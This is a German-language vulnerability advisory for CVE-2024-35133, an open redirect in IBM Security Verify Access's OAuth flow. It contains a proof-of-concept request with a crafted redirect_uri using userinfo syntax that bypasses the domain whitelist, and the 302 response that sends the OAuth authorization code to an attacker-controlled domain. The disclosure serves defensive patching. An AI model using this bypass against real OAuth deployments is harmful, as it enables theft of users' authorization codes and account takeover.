
Sicherheitsbulletin für CVE-2024-35133 - Mit PoC
Revision: 1.0
Auswirkungen:
Indem ein Angreifer ein Opfer dazu verleitet, eine speziell gestaltete Website zu besuchen, könnte er diese Schwachstelle ausnutzen, um die angezeigte URL zu fälschen und den Benutzer auf eine bösartige Website umzuleiten. Dadurch könnte der Angreifer hochsensible Informationen erlangen oder weitere Angriffe gegen das Opfer durchführen.
Schweregrad:
CVSS-Wert:
CVE-ID: CVE-2024-35133
Anbieter: IBM
Betroffene Produkte:
Betroffene Versionen: 10.0.0 – 10.0.8
IBM Security Verify Access ist eine vollständige Lösung für Autorisierung und Netzwerksicherheitsrichtlinienverwaltung. Es bietet End-to-End-Schutz von Ressourcen über geografisch verteilte Intranets und Extranets.
Zu den wichtigsten Funktionen gehören:
Bei einem Penetrationstest des OAuth-Ablaufs für einen Kunden wurde eine Schwachstelle mit offener Weiterleitung (Open Redirect) entdeckt, die das Abfließen der OAuth-Variablen „code“ ermöglicht.
Durch Umgehung der Parser-Logik, die für die Überprüfung des Parameters „redirect_uri“ während eines OAuth-Ablaufs verantwortlich ist (unter Ausnutzung von RFC 3986), konnte der Angreifer den Domain-Whitelist-Filter in IBM Security Verify Access manipulieren. Dies führte zu einer offenen Weiterleitung auf eine beliebige, vom Angreifer kontrollierte Domain. Das Opfer konnte auf eine bösartige Website umgeleitet werden, während die Domain vertrauenswürdig erschien.
Dies könnte zur Offenlegung sensibler Informationen wie des OAuth-Tokens „code“ oder zu weiteren Angriffen gegen das Opfer führen.
GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
HTTP/1.1 302 Found
content-language: en-US
date: Tue, 19 Mar 2024 16:04:35 GMT
location: https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED]
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-frame-options: DENY
x-content-type-options: nosniff
cache-control: no-store
x-xss-protection: 1; mode=block
x-permitted-cross-domain-policies: none
cross-origin-resource-policy: same-site
content-security-policy: frame-ancestors 'none'
referrer-policy: no-referrer-when-downgrade
strict-transport-security: max-age=31536000; includeSubDomains
pragma: no-cache
Content-Length: 0.
Informationen zu Patch, Upgrade oder empfohlenen Workarounds finden Sie im IBM Security Bulletin 7166712.
Weitere Details finden Sie unter Referenzen.
Diese Schwachstelle wurde entdeckt und gemeldet von:
Copyright (c) 2024 Giulio Garzia „Ozozuz“
Die elektronische Weiterverbreitung dieses Hinweises ist gestattet. Er darf nur mit ausdrücklicher schriftlicher Zustimmung bearbeitet werden. Für die Genehmigung, diesen Hinweis in anderen Medien abzudrucken, kontaktieren Sie den Autor.
Haftungsausschluss: Die Informationen in dieser Warnmeldung sind zum Zeitpunkt der Veröffentlichung auf der Grundlage der verfügbaren Daten korrekt. Es werden keine Gewährleistungen übernommen. Weder der Autor noch der Herausgeber haften für direkte, indirekte oder Folgeschäden, die aus der Verwendung dieser Informationen entstehen.